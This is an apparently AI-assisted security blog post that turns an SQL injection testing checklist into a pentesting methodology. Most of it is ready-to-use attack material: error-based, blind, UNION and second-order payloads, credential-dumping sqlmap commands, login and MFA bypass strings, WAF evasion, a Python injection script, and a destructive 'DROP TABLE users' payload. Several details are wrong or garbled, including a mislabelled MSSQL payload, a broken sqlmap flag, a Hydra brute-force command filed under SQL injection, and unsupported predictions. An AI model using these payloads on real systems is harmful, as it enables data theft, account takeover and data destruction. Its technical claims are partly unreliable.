Listen to this Post
Introduction:
SQL Injection (SQLi) remains one of the most prevalent and dangerous web application vulnerabilities, consistently ranking in the OWASP Top 10 despite decades of awareness. Modern web applications are more complex than ever, with attack surfaces expanding beyond traditional form parameters to include JSON payloads, GraphQL arguments, HTTP headers, and WebSocket messages. This comprehensive guide transforms Dharamveer Prasad’s expert SQL injection testing checklist into an actionable, step-by-step methodology for penetration testers, bug bounty hunters, and application security engineers.
Learning Objectives:
- Master systematic input discovery across all modern web application attack surfaces (GET, POST, headers, cookies, APIs)
- Execute and differentiate between five primary SQL injection techniques: Error-Based, Boolean-Based Blind, Time-Based Blind, UNION-Based, and Second-Order
- Implement automated and manual exploitation workflows using industry-standard tools like SQLmap, Burp Suite, and custom scripts
You Should Know:
1. Input Discovery: Mapping the Complete Attack Surface
Before injecting a single payload, you must identify every location where user-controlled data interacts with the backend database. Modern applications expose numerous injection points beyond obvious form fields.
Extended Methodology:
Start by intercepting all HTTP traffic through Burp Suite or OWASP ZAP. Systematically catalog:
- GET Parameters: URL query strings, search filters, sorting/pagination controls, export functions, and hidden parameters
- POST Parameters: Login/registration forms, password reset, contact/update forms, payment processing, and file upload metadata
- HTTP Headers: User-Agent, Referer, X-Forwarded-For, X-Client-IP, Host, and custom authentication headers
- Cookies: Session identifiers, tracking IDs, and preference cookies
- API Endpoints: JSON/XML parameters, GraphQL queries and mutations, multipart form fields, and WebSocket messages
Step-by-Step Implementation:
Linux/macOS (using curl and Burp Suite):
Intercept and log all parameters from a target endpoint curl -X GET "https://target.com/api/users?page=1&sort=name&filter=active" \ -H "User-Agent: Mozilla/5.0" \ -H "X-Forwarded-For: 127.0.0.1" \ --cookie "sessionid=abc123" \ -v Test for parameter discovery using parameter brute-forcing ffuf -u "https://target.com/page?FUZZ=test" -w /usr/share/wordlists/param_names.txt -fc 404 Enumerate GraphQL endpoints and arguments graphql-cop -t https://target.com/graphql -e
Windows (PowerShell):
Basic parameter discovery with Invoke-WebRequest
Invoke-WebRequest -Uri "https://target.com/api/search?q=test" -Method GET -Headers @{"User-Agent"="Mozilla/5.0"}
Burp Suite professional - use Param Miner extension for automated parameter discovery
Install from BApp Store and run "Guess parameters" functionality
Automation Tip: Use Burp Suite’s Param Miner extension to automatically discover hidden parameters through common naming conventions and brute-force techniques.
2. Error-Based SQL Injection: The Loudest Vulnerability
Error-based SQL injection is the most straightforward technique to identify and exploit. When you inject malformed SQL syntax, the database returns verbose error messages that reveal critical information about the database structure, version, and even table names.
Step-by-Step Implementation:
Phase 1: Basic Syntax Testing
Inject single quotes, double quotes, backticks, and comment characters to trigger database errors:
' OR '1'='1
' OR 1=1--
' OR 1=1
" OR "1"="1
') OR ('1'='1
Phase 2: Database Fingerprinting
Different databases emit unique error messages. Identify the backend DBMS through crafted payloads:
-- MySQL: You have an error in your SQL syntax; check the manual... ' AND 1=CONVERT(int, @@version)-- -- MSSQL: Conversion failed when converting the nvarchar value... ' AND 1=CONVERT(int, @@VERSION)-- -- PostgreSQL: ERROR: invalid input syntax for type integer... ' AND 1=CAST(version() AS int)-- -- Oracle: ORA-01722: invalid number... ' AND 1=TO_NUMBER(version)--
Phase 3: Data Extraction Using Errors
Once you identify the DBMS, use error-based techniques to extract data:
-- MySQL: Extract database name via error ' AND extractvalue(1, concat(0x7e, database()))-- -- MSSQL: Extract table names ' AND 1=CONVERT(int, (SELECT TOP 1 table_name FROM information_schema.tables))-- -- PostgreSQL: Extract current user ' AND 1=CAST((SELECT current_user) AS int)--
Automated Tools:
Linux (SQLmap):
Basic error-based detection sqlmap -u "https://target.com/page?id=1" --batch --level=3 Extract database names with error-based technique sqlmap -u "https://target.com/page?id=1" --dbs --technique=E Enumerate tables from a specific database sqlmap -u "https://target.com/page?id=1" -D database_name --tables --technique=E
Windows (GUI Tools):
- Burp Suite Professional: Use the Scanner’s active scan to automatically detect error-based SQLi
- Havij (legacy): Automated SQL injection tool with error-based exploitation
- SQLMap (Python): Cross-platform, run via `python sqlmap.py -u “target” –technique=E`
3. Boolean-Based Blind SQL Injection: Silent But Deadly
When error messages are suppressed, boolean-based blind SQL injection becomes your primary technique. You infer database information by observing differences in application responses (content length, status codes, or redirect behavior) when injecting true/false conditions.
Step-by-Step Implementation:
Phase 1: Establish Baseline Responses
Send legitimate requests and record the response characteristics:
Record baseline content length and status code
curl -s -o /dev/null -w "%{http_code} %{size_download}\n" "https://target.com/page?id=1"
Output: 200 4523
Phase 2: Test True/False Conditions
Inject conditions that are always true and always false:
-- Always true (should return normal content) ' AND 1=1-- -- Always false (should return different content or error) ' AND 1=2--
Compare response lengths and content. If they differ, the parameter is vulnerable.
Phase 3: Extract Data Character by Character
Use substring functions to extract data one character at a time:
-- MySQL/PostgreSQL: Extract first character of database name ' AND SUBSTRING(database(),1,1)='a'-- -- MSSQL: Extract using SUBSTRING ' AND SUBSTRING(db_name(),1,1)='a'-- -- Oracle: Extract using SUBSTR ' AND SUBSTR((SELECT banner FROM v$version),1,1)='a'--
Automation with SQLmap:
Boolean-based blind detection sqlmap -u "https://target.com/page?id=1" --technique=B --batch Extract database names using boolean technique sqlmap -u "https://target.com/page?id=1" --dbs --technique=B --threads=5 Dump entire table with optimized boolean inference sqlmap -u "https://target.com/page?id=1" -D db -T users --dump --technique=B --1o-cast
Custom Python Script for Boolean-Based Exploitation:
import requests
import string
def boolean_injection(url, param, payload_true, payload_false):
"""Test boolean-based SQL injection by comparing response lengths"""
base_response = requests.get(f"{url}?{param}=1")
base_length = len(base_response.text)
Test true condition
true_payload = f"1' AND {payload_true}--"
true_response = requests.get(f"{url}?{param}={true_payload}")
Test false condition
false_payload = f"1' AND {payload_false}--"
false_response = requests.get(f"{url}?{param}={false_payload}")
if len(true_response.text) == base_length and len(false_response.text) != base_length:
print("[+] Boolean-based SQL injection confirmed!")
return True
return False
Example usage
boolean_injection("https://target.com/page", "id", "1=1", "1=2")
4. Time-Based Blind SQL Injection: Patience Pays Off
When both error messages and visible response differences are absent, time-based blind SQL injection becomes your last resort. You inject database sleep functions and measure response delays to infer boolean conditions.
Step-by-Step Implementation:
Phase 1: Identify Time-Delay Functions
Different databases use different sleep functions:
-- MySQL: SLEEP(seconds) or BENCHMARK()
' AND SLEEP(5)--
' AND BENCHMARK(10000000, MD5('test'))--
-- MSSQL: WAITFOR DELAY
' WAITFOR DELAY '0:0:5'--
-- PostgreSQL: pg_sleep(seconds)
' AND pg_sleep(5)--
-- Oracle: DBMS_LOCK.SLEEP(seconds)
' AND DBMS_LOCK.SLEEP(5)--
Phase 2: Conditional Time Delays
Combine sleep functions with conditional logic to extract data:
-- MySQL: Delay if first character of database is 'a' ' AND IF(SUBSTRING(database(),1,1)='a', SLEEP(5), 0)-- -- MSSQL: Delay if condition true ' IF (SUBSTRING(db_name(),1,1)='a') WAITFOR DELAY '0:0:5'-- -- PostgreSQL: Delay if condition true ' AND CASE WHEN (SUBSTRING(current_database(),1,1)='a') THEN pg_sleep(5) ELSE pg_sleep(0) END--
Phase 3: Automated Detection with SQLmap:
Time-based blind detection with increased delay sqlmap -u "https://target.com/page?id=1" --technique=T --time-sec=5 --batch Extract data using time-based technique (slower but reliable) sqlmap -u "https://target.com/page?id=1" --dbs --technique=T --time-sec=10 --threads=1 Advanced: Use tamper scripts to bypass WAF sqlmap -u "https://target.com/page?id=1" --technique=T --tamper=space2comment --time-sec=8
Manual Time-Based Testing with cURL:
Measure response time for normal request time curl -s "https://target.com/page?id=1" -o /dev/null Measure response time for delayed payload time curl -s "https://target.com/page?id=1' AND SLEEP(5)--" -o /dev/null If second request takes ~5 seconds longer, vulnerability confirmed
5. UNION-Based SQL Injection: The Data Exfiltration King
UNION-based SQL injection allows you to combine the results of your injected query with the original query, directly extracting database contents.
Step-by-Step Implementation:
Phase 1: Determine Number of Columns
Use `ORDER BY` or `UNION SELECT NULL` to enumerate columns:
-- Method 1: ORDER BY (increment until error) ' ORDER BY 1-- ' ORDER BY 2-- ' ORDER BY 3-- -- Error at column 4 means 3 columns exist -- Method 2: UNION SELECT NULL (increment NULLs) ' UNION SELECT NULL-- ' UNION SELECT NULL,NULL-- ' UNION SELECT NULL,NULL,NULL-- -- Success with 3 NULLs means 3 columns exist
Phase 2: Identify Displayed Columns
Replace NULLs with values to see which columns are rendered:
' UNION SELECT 'test',NULL,NULL-- ' UNION SELECT NULL,'test',NULL-- ' UNION SELECT NULL,NULL,'test'-- -- The column showing 'test' is displayed in the response
Phase 3: Extract Database Information
Once you identify displayable columns, extract data:
-- Extract database version ' UNION SELECT @@version,NULL,NULL-- -- Extract current database name ' UNION SELECT database(),NULL,NULL-- -- Extract table names (MySQL) ' UNION SELECT table_name,NULL,NULL FROM information_schema.tables-- -- Extract column names ' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'-- -- Dump credentials ' UNION SELECT username,password,NULL FROM users--
Automated Exploitation with SQLmap:
UNION-based detection and exploitation sqlmap -u "https://target.com/page?id=1" --technique=U --batch Enumerate columns and dump data sqlmap -u "https://target.com/page?id=1" -D db -T users --columns --dump --technique=U Use --union-cols to specify column count sqlmap -u "https://target.com/page?id=1" --union-cols=3 --union-char=test --technique=U
6. Authentication Bypass via SQL Injection
Authentication bypass is one of the most critical SQL injection vectors, allowing attackers to gain unauthorized access without valid credentials.
Step-by-Step Implementation:
Phase 1: Basic Login Bypass Payloads
-- Classic OR injection (username field) username: admin' OR '1'='1 password: anything -- Comment out password check username: admin'-- password: anything -- Union-based bypass username: ' UNION SELECT 1,'admin','password'-- password: anything -- Always true condition username: ' OR 1=1-- password: ' OR 1=1--
Phase 2: Advanced Bypass Techniques
-- Bypass using stacked queries (MSSQL) username: admin'; DROP TABLE users;-- password: anything -- Bypass with encoding (useful against WAF) username: admin'//OR//1=1-- password: anything -- Bypass using CASE statements username: ' OR CASE WHEN 1=1 THEN 1 ELSE 0 END-- password: anything
Phase 3: MFA and Password Reset Bypass
-- Bypass MFA verification mfa_code: ' OR '1'='1-- -- Password reset token manipulation token: ' UNION SELECT admin_token FROM users WHERE '1'='1-- -- Account verification bypass verification_code: ' OR 1=1--
Automated Tools:
Hydra with SQL injection payloads hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid" Custom Python script for automated bypass Using the AuthBypass tool from GitHub git clone https://github.com/0xgh057r3c0n/AuthBypass python authbypass.py -u https://target.com/login -f username -p password
7. Second-Order SQL Injection: The Sleeping Giant
Second-order SQL injection occurs when malicious payloads are stored in the database by one application function and later executed by a different function without proper sanitization. This is particularly dangerous because input validation may pass initial checks but fail during subsequent processing.
Step-by-Step Implementation:
Phase 1: Identify Stored Input Vectors
Look for user-controllable data that gets stored and later used in SQL queries:
- User registration: username, email, full name
- Profile updates: bio, company name, shipping address
- Order processing: product reviews, notes fields
- Admin functions: audit logs, system notes
Phase 2: Inject Sleeping Payloads
Inject time-delay payloads into stored fields:
-- Register with malicious payload username: test' OR SLEEP(5)-- email: [email protected] -- Then trigger a function that queries the username -- For example: view profile, search users, generate report -- If response is delayed by 5 seconds, second-order SQLi exists
Phase 3: Extract Data Through Stored Procedures
-- Step 1: Store payload in profile Bio: ' UNION SELECT username,password FROM users WHERE '1'='1 -- Step 2: Trigger stored procedure that uses bio in query -- The UNION query executes, revealing credentials
Detection with SQLmap (Second-Order):
Use --second-order flag to specify the URL that triggers the stored payload sqlmap -u "https://target.com/register" --data="username=test&[email protected]" \ --second-order="https://target.com/profile" --technique=T --batch Advanced: Use --second-req to specify the request that triggers execution sqlmap -u "https://target.com/register" --second-req=second_order.txt --batch
Burp Suite Configuration:
1. Intruder: Send payloads to stored input fields
2. Sequencer: Analyze session tokens after payload injection
- Repeater: Manually test stored payloads by triggering different application functions
What Undercode Say:
- Key Takeaway 1: SQL injection remains the most critical web application vulnerability because it directly compromises the database layer—the heart of modern applications. The checklist approach transforms chaotic testing into a systematic, repeatable methodology that covers every possible attack surface.
-
Key Takeaway 2: Modern web applications demand modern testing approaches. Beyond traditional form parameters, security professionals must probe JSON APIs, GraphQL endpoints, WebSocket messages, and HTTP headers. The attack surface has expanded exponentially, and your testing methodology must evolve accordingly.
Analysis: Dharamveer Prasad’s SQL Injection Testing Checklist represents a comprehensive, battle-tested methodology refined through real-world bug bounty hunting and enterprise application security assessments. The systematic approach—starting with input discovery, progressing through five distinct injection techniques, and culminating in advanced vectors like authentication bypass and second-order injection—mirrors the mental model of elite penetration testers. What sets this checklist apart is its coverage of modern attack surfaces (GraphQL, JSON, WebSockets) often overlooked in traditional penetration testing guides. The inclusion of second-order SQL injection is particularly valuable, as many testers focus exclusively on first-order vulnerabilities, leaving stored payload vectors unexploited. For bug bounty hunters, mastering this checklist means moving from random payload spraying to methodical, high-probability vulnerability discovery.
Prediction:
- +1 Organizations will increasingly adopt AI-powered WAF solutions that dynamically learn and block SQL injection patterns, but attackers will counter with AI-generated polymorphic payloads that evade detection.
-
-1 The proliferation of GraphQL and REST APIs will expand the SQL injection attack surface by 300% over the next 18 months, with most organizations unprepared to secure these new endpoints.
-
-1 Legacy applications with unpatched SQL injection vulnerabilities will remain the primary attack vector for data breaches, as modern DevSecOps practices fail to address technical debt in enterprise systems.
-
+1 Automated SQL injection testing frameworks like SQLmap will evolve to include machine learning-based detection, reducing false positives and accelerating vulnerability remediation cycles.
-
-1 The rise of serverless architectures and microservices will create new SQL injection vectors through inter-service communication channels, where traditional WAFs cannot inspect traffic.
▶️ Related Video (76% Match):
https://www.youtube.com/watch?v=-Fff_lskdeM
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: Dharamveer Prasad – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
